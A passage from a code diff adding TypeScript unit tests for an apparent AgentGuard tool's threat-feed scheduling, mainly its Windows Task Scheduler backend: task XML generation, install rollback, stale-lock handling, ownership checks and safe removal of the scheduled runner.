+    assert.equal(matches('*/15 * * * *', 'UTC', new Date('2026-09-07T10:30:45Z')), true);
+    assert.equal(matches('*/15 * * * *', 'UTC', new Date('2026-09-07T10:31:00Z')), false);
+    assert.equal(matches('0 3 * * *', 'Asia/Shanghai', new Date('2026-09-06T19:00:20Z')), true);
+  });
+
+  it('runs a due Windows cron tick once with the configured AgentGuard home', async () => {
+    const runWindowsCronTick = (cronModule as Record<string, unknown>).runWindowsCronTick;
+    assert.equal(typeof runWindowsCronTick, 'function');
+    const runTick = runWindowsCronTick as (
+      configPath: string,
+      adapters: Record<string, unknown>,
+    ) => Promise<{ ran: boolean; reason: string }>;
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-tick-'));
+    const configPath = join(home, 'task.json');
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '*/15 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\Program Files\\nodejs\\node.exe',
+      cliEntrypoint: 'C:\\AgentGuard\\dist\\cli.js',
+    }));
+    const calls: Array<{ command: string; args: string[]; env?: NodeJS.ProcessEnv }> = [];
+    const adapters = {
+      now: () => new Date('2026-09-07T10:30:45Z'),
+      runCommand: async (command: string, args: string[], _input?: string, options?: { env?: NodeJS.ProcessEnv }) => {
+        calls.push({ command, args, env: options?.env });
+        return { stdout: '{"supported":true}\n', stderr: '' };
+      },
+    };
+
+    const first = await runTick(configPath, adapters);
+    const second = await runTick(configPath, adapters);
+
+    assert.deepEqual(first, { ran: true, reason: 'executed' });
+    assert.deepEqual(second, { ran: false, reason: 'already-checked' });
+    assert.equal(calls.length, 1);
+    assert.equal(calls[0]?.command, 'C:\\Program Files\\nodejs\\node.exe');
+    assert.deepEqual(calls[0]?.args, [
+      'C:\\AgentGuard\\dist\\cli.js', 'subscribe', '--quiet', '--json', '--cron-run',
+    ]);
+    assert.equal(calls[0]?.env?.AGENTGUARD_HOME, home);
+  });
+
+  it('catches up one missed Windows cron occurrence after a delayed scheduler tick', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-catchup-'));
+    const configPath = join(home, 'task.json');
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '15 * * * *',
+      timezone: 'UTC',
+      quiet: false,
+      agentGuardHome: home,
+      nodeExecutable: 'node.exe',
+      cliEntrypoint: 'cli.js',
+    }));
+    writeFileSync(`${configPath}.state.json`, JSON.stringify({
+      version: 1,
+      lastCheckedMinute: '2026-09-07T10:00:00.000Z',
+    }));
+    let executions = 0;
+
+    const result = await cronModule.runWindowsCronTick(configPath, {
+      now: () => new Date('2026-09-07T10:31:20Z'),
+      async runCommand() {
+        executions += 1;
+        return { stdout: '', stderr: '' };
+      },
+    });
+
+    assert.deepEqual(result, { ran: true, reason: 'executed' });
+    assert.equal(executions, 1);
+  });
+
+  it('recovers a stale Windows cron runner lock after an interrupted process', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-stale-lock-'));
+    const configPath = join(home, 'task.json');
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '* * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'node.exe',
+      cliEntrypoint: 'cli.js',
+    }));
+    const lockPath = `${configPath}.lock`;
+    writeFileSync(lockPath, 'interrupted');
+    const stale = new Date('2026-09-07T10:00:00Z');
+    utimesSync(lockPath, stale, stale);
+
+    const result = await cronModule.runWindowsCronTick(configPath, {
+      now: () => new Date('2026-09-07T10:30:00Z'),
+      async runCommand() { return { stdout: '', stderr: '' }; },
+    });
+
+    assert.deepEqual(result, { ran: true, reason: 'executed' });
+    assert.equal(existsSync(lockPath), false);
+  });
+
+  it('quarantines malformed Windows cron state instead of disabling future ticks', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-corrupt-state-'));
+    const configPath = join(home, 'task.json');
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '* * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'node.exe',
+      cliEntrypoint: 'cli.js',
+    }));
+    writeFileSync(`${configPath}.state.json`, '{truncated');
+
+    const result = await cronModule.runWindowsCronTick(configPath, {
+      now: () => new Date('2026-09-07T10:30:00Z'),
+      async runCommand() { return { stdout: '', stderr: '' }; },
+    });
+
+    assert.deepEqual(result, { ran: true, reason: 'executed' });
+    assert.equal(
+      readdirSync(home).some((name) => name.startsWith('task.json.state.json.corrupt-')),
+      true,
+    );
+    assert.doesNotThrow(() => JSON.parse(readFileSync(`${configPath}.state.json`, 'utf8')));
+  });
+
   it('validateCronExpression rejects non-five-field values', () => {
     assert.equal(validateCronExpression('0 * * * *'), '0 * * * *');
     assert.equal(validateCronExpression('  */5   * * * *  '), '*/5 * * * *');
     assert.throws(() => validateCronExpression('0 * * *'), /Invalid --cron/);
     assert.throws(() => validateCronExpression('0 * * * * *'), /Invalid --cron/);
+  });
+
+  it('preserves command exit codes for locale-independent scheduler errors', async () => {
+    const execCommand = (cronModule as Record<string, unknown>).execCommand;
+    assert.equal(typeof execCommand, 'function');
+    const execute = execCommand as CommandRunner;
+
+    await assert.rejects(
+      execute(process.execPath, ['-e', 'process.exit(2)']),
+      (error: unknown) => (error as { exitCode?: unknown }).exitCode === 2,
+    );
+  });
+
+  it('decodes UTF-16LE command output used by native Windows tools', async () => {
+    const expected = '<?xml version="1.0" encoding="UTF-16"?><Task>测试</Task>';
+    const script = `process.stdout.write(Buffer.concat([Buffer.from([0xff, 0xfe]), Buffer.from(${JSON.stringify(expected)}, 'utf16le')]))`;
+    const result = await cronModule.execCommand(process.execPath, ['-e', script]);
+
+    assert.equal(result.stdout, expected);
+  });
+
+  it('reports the configured command timeout', async () => {
+    await assert.rejects(
+      cronModule.execCommand(process.execPath, ['-e', 'setTimeout(() => {}, 1000)'], undefined, { timeoutMs: 25 }),
+      /timed out after 25ms/,
+    );
   });
 
   it('adds an OpenClaw cron job with no-delivery fallback and cron schedule', async () => {
@@ -202,6 +421,668 @@ describe('feed/cron', () => {
       assert.match(script, new RegExp(`export AGENTGUARD_HOME='${home.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')}'`));
       assert.match(script, /exec agentguard subscribe --quiet --json --cron-run/);
     }
+  });
+
+  it('auto-installs Windows Task Scheduler jobs for local agent hosts on Windows', async () => {
+    for (const agentHost of ['claude-code', 'codex', 'dsh'] as const) {
+      const calls: Array<{ command: string; args: string[]; input?: string }> = [];
+      const home = mkdtempSync(join(tmpdir(), `agentguard-windows-${agentHost}-`));
+      const runner: CommandRunner = async (command, args, input) => {
+        calls.push({ command, args, input });
+        if (command === 'schtasks.exe' && args[0] === '/Query') {
+          throw Object.assign(new Error('localized task-not-found message'), { exitCode: 0x80070002 });
+        }
+        if (command === 'whoami.exe') {
+          return { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' };
+        }
+        return { stdout: '', stderr: '' };
+      };
+
+      const result = await installThreatFeedCron(
+        {
+          name: 'agentguard-threat-feed',
+          cronExpression: '*/15 * * * *',
+          quiet: true,
+          force: false,
+          backend: 'auto',
+          agentHost,
+          agentGuardHome: home,
+          timezone: 'Asia/Shanghai',
+        },
+        { runCommand: runner, platform: 'win32' } as Parameters<typeof installThreatFeedCron>[1]
+      );
+
+      assert.equal(result.backend, 'windows-task-scheduler');
+      assert.equal(result.created, true);
+      assert.equal(calls[0]?.command, 'schtasks.exe');
+      assert.equal(calls[0]?.args[0], '/Query');
+      assert.equal(calls[1]?.command, 'whoami.exe');
+      assert.equal(calls[2]?.command, 'schtasks.exe');
+      assert.equal(calls[2]?.args[0], '/Create');
+    }
+  });
+
+  it('rejects invalid Windows cron syntax before querying or creating a task', async () => {
+    let calls = 0;
+    await assert.rejects(
+      installThreatFeedCron(
+        {
+          name: 'agentguard-threat-feed',
+          cronExpression: 'invalid * * * *',
+          quiet: true,
+          force: false,
+          backend: 'windows',
+        },
+        {
+          platform: 'win32',
+          async runCommand() {
+            calls += 1;
+            return { stdout: '', stderr: '' };
+          },
+        },
+      ),
+      /cron/i,
+    );
+    assert.equal(calls, 0);
+  });
+
+  it('registers a current-user Windows task from XML with a minute cron runner', async () => {
+    const calls: Array<{ command: string; args: string[]; input?: string }> = [];
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-xml-'));
+    const runner: CommandRunner = async (command, args, input) => {
+      calls.push({ command, args, input });
+      if (command === 'schtasks.exe' && args[0] === '/Query') {
+        throw Object.assign(new Error('task not found'), { exitCode: 0x80070002 });
+      }
+      if (command === 'whoami.exe') {
+        return { stdout: '"DESKTOP\\jeff","S-1-5-21-100-200-300-1001"\r\n', stderr: '' };
+      }
+      return { stdout: '', stderr: '' };
+    };
+
+    const result = await installThreatFeedCron(
+      {
+        name: 'agentguard-threat-feed',
+        cronExpression: '30 3 * * *',
+        quiet: false,
+        force: false,
+        backend: 'windows',
+        agentGuardHome: home,
+        timezone: 'Asia/Shanghai',
+      },
+      {
+        runCommand: runner,
+        platform: 'win32',
+        nodeExecutable: 'C:\\Program Files\\nodejs\\node.exe',
+        cliEntrypoint: 'C:\\Program Files\\AgentGuard & Tools\\dist\\cli.js',
+        now: () => new Date('2026-09-07T10:30:20Z'),
+      } as Parameters<typeof installThreatFeedCron>[1]
+    );
+
+    const xmlPath = join(home, 'scripts', 'agentguard-threat-feed.task.xml');
+    const configPath = join(home, 'scripts', 'agentguard-threat-feed.windows-cron.json');
+    const create = calls.find((call) => call.command === 'schtasks.exe' && call.args[0] === '/Create');
+    assert.deepEqual(create?.args, [
+      '/Create', '/TN', 'AgentGuard-agentguard-threat-feed', '/XML', xmlPath, '/F', '/HRESULT',
+    ]);
+    assert.equal(result.script, configPath);
+
+    const config = JSON.parse(readFileSync(configPath, 'utf8'));
+    assert.deepEqual(config, {
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '30 3 * * *',
+      timezone: 'Asia/Shanghai',
+      quiet: false,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\Program Files\\nodejs\\node.exe',
+      cliEntrypoint: 'C:\\Program Files\\AgentGuard & Tools\\dist\\cli.js',
+    });
+
+    const xmlBytes = readFileSync(xmlPath);
+    assert.deepEqual([...xmlBytes.subarray(0, 2)], [0xff, 0xfe]);
+    const xml = xmlBytes.subarray(2).toString('utf16le');
+    assert.match(xml, /^<\?xml version="1\.0" encoding="UTF-16"\?>/);
+    assert.match(xml, /<UserId>S-1-5-21-100-200-300-1001<\/UserId>/);
+    assert.match(xml, /<LogonType>InteractiveToken<\/LogonType>/);
+    assert.match(xml, /<RunLevel>LeastPrivilege<\/RunLevel>/);
+    assert.match(xml, /<Interval>PT1M<\/Interval>/);
+    assert.match(xml, /<MultipleInstancesPolicy>IgnoreNew<\/MultipleInstancesPolicy>/);
+    assert.match(xml, /<ExecutionTimeLimit>PT10M<\/ExecutionTimeLimit>/);
+    assert.match(xml, /<Command>C:\\Program Files\\nodejs\\node\.exe<\/Command>/);
+    assert.match(xml, /AgentGuard &amp; Tools/);
+    assert.match(xml, /windows-cron-run/);
+  });
+
+  it('does not overwrite a Windows task when Task Scheduler query is denied', async () => {
+    const calls: Array<{ command: string; args: string[] }> = [];
+    const runner: CommandRunner = async (command, args) => {
+      calls.push({ command, args });
+      throw Object.assign(new Error('access denied'), { exitCode: 0x80070005 });
+    };
+
+    await assert.rejects(
+      installThreatFeedCron(
+        {
+          name: 'agentguard-threat-feed',
+          cronExpression: '0 * * * *',
+          quiet: true,
+          force: false,
+          backend: 'windows',
+        },
+        { runCommand: runner, platform: 'win32' } as Parameters<typeof installThreatFeedCron>[1],
+      ),
+      /Could not query Windows scheduled task.*access denied/i,
+    );
+    assert.deepEqual(calls.map((call) => call.args[0]), ['/Query']);
+  });
+
+  it('does not trust an unrelated task that collides with the managed Windows task name', async () => {
+    let calls = 0;
+    await assert.rejects(
+      installThreatFeedCron(
+        {
+          name: 'agentguard-threat-feed',
+          cronExpression: '0 * * * *',
+          quiet: true,
+          force: false,
+          backend: 'windows',
+        },
+        {
+          platform: 'win32',
+          async runCommand() {
+            calls += 1;
+            return { stdout: '<Task><Actions><Exec><Command>unrelated.exe</Command></Exec></Actions></Task>', stderr: '' };
+          },
+        },
+      ),
+      /not a managed AgentGuard task/i,
+    );
+    assert.equal(calls, 1);
+  });
+
+  it('rejects Windows action paths containing environment expansion syntax', async () => {
+    let calls = 0;
+    await assert.rejects(
+      installThreatFeedCron(
+        {
+          name: 'agentguard-threat-feed',
+          cronExpression: '0 * * * *',
+          quiet: true,
+          force: false,
+          backend: 'windows',
+          agentGuardHome: 'C:\\Users\\%USERNAME%\\.agentguard',
+        },
+        {
+          platform: 'win32',
+          async runCommand() {
+            calls += 1;
+            return { stdout: '', stderr: '' };
+          },
+        },
+      ),
+      /must not contain.*%/i,
+    );
+    assert.equal(calls, 0);
+  });
+
+  it('restores Windows runner files when forced task registration fails', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-create-rollback-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    const configPath = join(scriptsDir, 'agentguard-threat-feed.windows-cron.json');
+    const xmlPath = join(scriptsDir, 'agentguard-threat-feed.task.xml');
+    const previousConfig = `${JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '0 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\cli.js',
+    })}\n`;
+    writeFileSync(configPath, previousConfig);
+    writeFileSync(xmlPath, 'previous xml\n');
+    const calls: Array<{ command: string; args: string[] }> = [];
+    const runner: CommandRunner = async (command, args) => {
+      calls.push({ command, args });
+      if (command === 'whoami.exe') {
+        return { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' };
+      }
+      if (command === 'schtasks.exe' && args[0] === '/Create') {
+        throw Object.assign(new Error('registration denied'), { exitCode: 0x80070005 });
+      }
+      return { stdout: managedWindowsTaskXml(configPath, false), stderr: '' };
+    };
+
+    await assert.rejects(
+      installThreatFeedCron(
+        {
+          name: 'agentguard-threat-feed',
+          cronExpression: '*/30 * * * *',
+          quiet: true,
+          force: true,
+          backend: 'windows',
+          agentGuardHome: home,
+        },
+        { platform: 'win32', runCommand: runner },
+      ),
+      /registration denied/,
+    );
+
+    assert.equal(readFileSync(configPath, 'utf8'), previousConfig);
+    assert.equal(readFileSync(xmlPath, 'utf8'), 'previous xml\n');
+    assert.equal(calls.some((call) => call.args.includes('/Enable')), false);
+  });
+
+  it('repairs a corrupt Windows runner config when force is set', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-force-repair-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    const configPath = join(scriptsDir, 'agentguard-threat-feed.windows-cron.json');
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '0 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\cli.js',
+    }));
+    const existingXml = managedWindowsTaskXml(configPath);
+    writeFileSync(configPath, '{not valid JSON');
+    const runner: CommandRunner = async (command, args) => {
+      if (command === 'whoami.exe') {
+        return { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' };
+      }
+      if (args[0] === '/Query') return { stdout: existingXml, stderr: '' };
+      return { stdout: '', stderr: '' };
+    };
+
+    const result = await installThreatFeedCron({
+      name: 'agentguard-threat-feed',
+      cronExpression: '15 * * * *',
+      quiet: true,
+      force: true,
+      backend: 'windows',
+      agentGuardHome: home,
+    }, {
+      platform: 'win32',
+      runCommand: runner,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\cli.js',
+    });
+
+    assert.equal(result.created, true);
+    assert.equal(JSON.parse(readFileSync(configPath, 'utf8')).cronExpression, '15 * * * *');
+  });
+
+  it('restores the registered Windows task when post-registration cleanup fails', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-task-rollback-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    const configPath = join(scriptsDir, 'agentguard-threat-feed.windows-cron.json');
+    const xmlPath = join(scriptsDir, 'agentguard-threat-feed.task.xml');
+    const previousConfig = JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '0 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\cli.js',
+    });
+    writeFileSync(configPath, previousConfig);
+    writeFileSync(xmlPath, 'previous generated xml');
+    const existingXml = managedWindowsTaskXml(configPath, false);
+    mkdirSync(`${configPath}.state.json`);
+    const registeredXml: string[] = [];
+    const runner: CommandRunner = async (command, args) => {
+      if (command === 'whoami.exe') {
+        return { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' };
+      }
+      if (args[0] === '/Query') return { stdout: existingXml, stderr: '' };
+      if (args[0] === '/Create') {
+        const bytes = readFileSync(args[4]!);
+        assert.deepEqual([...bytes.subarray(0, 2)], [0xff, 0xfe]);
+        registeredXml.push(bytes.subarray(2).toString('utf16le'));
+      }
+      return { stdout: '', stderr: '' };
+    };
+
+    await assert.rejects(
+      installThreatFeedCron({
+        name: 'agentguard-threat-feed',
+        cronExpression: '30 * * * *',
+        quiet: true,
+        force: true,
+        backend: 'windows',
+        agentGuardHome: home,
+      }, { platform: 'win32', runCommand: runner }),
+      /directory|EISDIR/i,
+    );
+
+    assert.equal(registeredXml.length, 2);
+    assert.equal(registeredXml[1], existingXml);
+    assert.equal(readFileSync(configPath, 'utf8'), previousConfig);
+    assert.equal(readFileSync(xmlPath, 'utf8'), 'previous generated xml');
+  });
+
+  it('resets Windows cron runner state after a successful forced reschedule', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-force-state-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    const configPath = join(scriptsDir, 'agentguard-threat-feed.windows-cron.json');
+    const statePath = `${configPath}.state.json`;
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '0 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\cli.js',
+    }));
+    writeFileSync(statePath, JSON.stringify({ version: 1, lastCheckedMinute: '2026-09-07T10:00:00.000Z' }));
+    const runner: CommandRunner = async (command) => {
+      if (command === 'schtasks.exe') {
+        return { stdout: managedWindowsTaskXml(configPath), stderr: '' };
+      }
+      return { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' };
+    };
+
+    await installThreatFeedCron({
+      name: 'agentguard-threat-feed',
+      cronExpression: '30 * * * *',
+      quiet: true,
+      force: true,
+      backend: 'windows',
+      agentGuardHome: home,
+    }, { platform: 'win32', runCommand: runner });
+
+    assert.equal(existsSync(statePath), false);
+  });
+
+  it('deletes the managed Windows task and its runner files', async () => {
+    const calls: Array<{ command: string; args: string[] }> = [];
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-remove-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    const configPath = join(scriptsDir, 'agentguard-threat-feed.windows-cron.json');
+    const xmlPath = join(scriptsDir, 'agentguard-threat-feed.task.xml');
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '0 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\cli.js',
+    }));
+    writeFileSync(xmlPath, '<Task/>');
+    const lockStartedAtMs = Date.now();
+    writeFileSync(`${configPath}.lock`, JSON.stringify({ version: 1, pid: 4242, startedAtMs: lockStartedAtMs }));
+    const runner: CommandRunner = async (command, args) => {
+      calls.push({ command, args });
+      if (command === 'whoami.exe') {
+        return { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' };
+      }
+      if (command === 'powershell.exe') {
+        return { stdout: JSON.stringify({
+          pid: 4242,
+          executablePath: 'C:\\node.exe',
+          commandLine: `"C:\\node.exe" "C:\\cli.js" windows-cron-run --config "${configPath}"`,
+          creationTimeMs: lockStartedAtMs,
+        }), stderr: '' };
+      }
+      return { stdout: managedWindowsTaskXml(configPath), stderr: '' };
+    };
+
+    const result = await removeThreatFeedCron(
+      {
+        name: 'agentguard-threat-feed',
+        backend: 'windows',
+        agentGuardHome: home,
+      },
+      { runCommand: runner, platform: 'win32' } as Parameters<typeof removeThreatFeedCron>[1]
+    );
+
+    assert.deepEqual(result, [{
+      name: 'agentguard-threat-feed',
+      backend: 'windows-task-scheduler',
+      removed: true,
+    }]);
+    assert.deepEqual(calls.map((call) => [call.command, call.args[0]]), [
+      ['schtasks.exe', '/Query'],
+      ['whoami.exe', '/User'],
+      ['schtasks.exe', '/Change'],
+      ['powershell.exe', '-NoProfile'],
+      ['taskkill.exe', '/PID'],
+      ['schtasks.exe', '/End'],
+      ['schtasks.exe', '/Delete'],
+    ]);
+    assert.deepEqual(calls[2]?.args, [
+      '/Change', '/TN', 'AgentGuard-agentguard-threat-feed', '/Disable',
+    ]);
+    assert.deepEqual(calls[4]?.args, [
+      '/PID', '4242', '/T', '/F',
+    ]);
+    assert.deepEqual(calls[5]?.args, [
+      '/End', '/TN', 'AgentGuard-agentguard-threat-feed',
+    ]);
+    assert.deepEqual(calls[6]?.args, [
+      '/Delete', '/TN', 'AgentGuard-agentguard-threat-feed', '/F',
+    ]);
+    assert.equal(existsSync(configPath), false);
+    assert.equal(existsSync(xmlPath), false);
+  });
+
+  it('does not delete a Windows task when its active runner cannot be stopped', async () => {
+    const calls: Array<{ command: string; args: string[] }> = [];
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-remove-active-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    const configPath = join(scriptsDir, 'agentguard-threat-feed.windows-cron.json');
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '0 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\cli.js',
+    }));
+    writeFileSync(`${configPath}.lock`, 'active');
+    const runner: CommandRunner = async (command, args) => {
+      calls.push({ command, args });
+      if (command === 'whoami.exe') {
+        return { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' };
+      }
+      if (args[0] === '/End') throw new Error('access denied');
+      return { stdout: managedWindowsTaskXml(configPath), stderr: '' };
+    };
+
+    const [result] = await removeThreatFeedCron(
+      { name: 'agentguard-threat-feed', backend: 'windows', agentGuardHome: home },
+      { runCommand: runner, platform: 'win32' },
+    );
+
+    assert.equal(result?.removed, false);
+    assert.match(result?.error ?? '', /could not stop active Windows scheduled task/i);
+    assert.equal(calls.some((call) => call.args[0] === '/Delete'), false);
+    assert.equal(existsSync(configPath), true);
+    assert.equal(existsSync(`${configPath}.lock`), true);
+  });
+
+  it('refuses to kill a reused PID that is not the expected Windows runner', async () => {
+    const calls: Array<{ command: string; args: string[] }> = [];
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-reused-pid-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    const configPath = join(scriptsDir, 'agentguard-threat-feed.windows-cron.json');
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '0 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\cli.js',
+    }));
+    writeFileSync(`${configPath}.lock`, JSON.stringify({ version: 1, pid: 4242, startedAtMs: Date.now() }));
+    const runner: CommandRunner = async (command, args) => {
+      calls.push({ command, args });
+      if (command === 'whoami.exe') {
+        return { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' };
+      }
+      if (command === 'powershell.exe') {
+        return { stdout: JSON.stringify({
+          pid: 4242,
+          executablePath: 'C:\\Windows\\System32\\notepad.exe',
+          commandLine: 'notepad.exe',
+          creationTimeMs: Date.now(),
+        }), stderr: '' };
+      }
+      return { stdout: managedWindowsTaskXml(configPath), stderr: '' };
+    };
+
+    const [result] = await removeThreatFeedCron(
+      { name: 'agentguard-threat-feed', backend: 'windows', agentGuardHome: home },
+      { runCommand: runner, platform: 'win32' },
+    );
+
+    assert.equal(result?.removed, false);
+    assert.match(result?.error ?? '', /does not match the managed Windows runner/i);
+    assert.equal(calls.some((call) => call.command === 'taskkill.exe'), false);
+    assert.equal(calls.some((call) => call.args[0] === '/Delete'), false);
+  });
+
+  it('rejects a managed-looking Windows task owned by a different user SID', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-wrong-owner-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    const configPath = join(scriptsDir, 'agentguard-threat-feed.windows-cron.json');
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '0 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\cli.js',
+    }));
+
+    const status = await inspectWindowsThreatFeedTask(
+      { name: 'agentguard-threat-feed', agentGuardHome: home },
+      { runCommand: async (command) => command === 'whoami.exe'
+        ? { stdout: 'user,S-1-5-21-999-888-777-1001\n', stderr: '' }
+        : { stdout: managedWindowsTaskXml(configPath), stderr: '' } },
+    );
+
+    assert.equal(status.installed, false);
+    assert.match(status.error ?? '', /not a managed AgentGuard task/i);
+  });
+
+  it('inspects the exact managed Windows task and cron expression', async () => {
+    const inspectWindowsThreatFeedTask = (cronModule as Record<string, unknown>).inspectWindowsThreatFeedTask;
+    assert.equal(typeof inspectWindowsThreatFeedTask, 'function');
+    const inspectTask = inspectWindowsThreatFeedTask as (
+      options: { name: string; agentGuardHome: string },
+      adapters: { runCommand: CommandRunner },
+    ) => Promise<{ name: string; installed: boolean; cronExpression?: string }>;
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-inspect-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    writeFileSync(join(scriptsDir, 'agentguard-threat-feed.windows-cron.json'), JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '*/15 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\agentguard\\cli.js',
+    }));
+
+    const status = await inspectTask(
+      { name: 'agentguard-threat-feed', agentGuardHome: home },
+      { runCommand: async (command) => command === 'whoami.exe'
+        ? { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' }
+        : {
+            stdout: managedWindowsTaskXml(join(scriptsDir, 'agentguard-threat-feed.windows-cron.json')),
+            stderr: '',
+          } },
+    );
+
+    assert.deepEqual(status, {
+      name: 'agentguard-threat-feed',
+      installed: true,
+      cronExpression: '*/15 * * * *',
+    });
+  });
+
+  it('treats a missing Windows scheduled task as confirmed absent', async () => {
+    const inspectWindowsThreatFeedTask = (cronModule as Record<string, unknown>).inspectWindowsThreatFeedTask as (
+      options: { name: string; agentGuardHome?: string },
+      adapters: { runCommand: CommandRunner },
+    ) => Promise<{ name: string; installed: boolean; error?: string }>;
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-absent-cleanup-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    const staleConfig = join(scriptsDir, 'agentguard-threat-feed.windows-cron.json');
+    const staleState = `${staleConfig}.state.json`;
+    writeFileSync(staleConfig, '{}');
+    writeFileSync(staleState, '{}');
+    const runner: CommandRunner = async () => {
+      throw Object.assign(new Error('localized task-not-found message'), { exitCode: 0x80070002 });
+    };
+
+    const status = await inspectWindowsThreatFeedTask(
+      { name: 'agentguard-threat-feed', agentGuardHome: home },
+      { runCommand: runner },
+    );
+    const removal = await removeThreatFeedCron(
+      { name: 'agentguard-threat-feed', backend: 'windows', agentGuardHome: home },
+      { runCommand: runner, platform: 'win32' } as Parameters<typeof removeThreatFeedCron>[1],
+    );
+
+    assert.deepEqual(status, { name: 'agentguard-threat-feed', installed: false });
+    assert.deepEqual(removal, [{
+      name: 'agentguard-threat-feed',
+      backend: 'windows-task-scheduler',
+      removed: false,
+    }]);
+    assert.equal(existsSync(staleConfig), false);
+    assert.equal(existsSync(staleState), false);
+  });
+
+  it('uses Task Scheduler instead of crontab when removing all backends on Windows', async () => {
+    const commands: string[] = [];
+    const runner: CommandRunner = async (command) => {
+      commands.push(command);
+      if (command === 'schtasks.exe') {
+        throw Object.assign(new Error('missing'), { exitCode: 2 });
+      }
+      return { stdout: '{"jobs":[]}', stderr: '' };
+    };
+    const gateway = { async request() { return { jobs: [] }; } };
+
+    const results = await removeThreatFeedCron(
+      { name: 'agentguard-threat-feed', backend: 'all' },
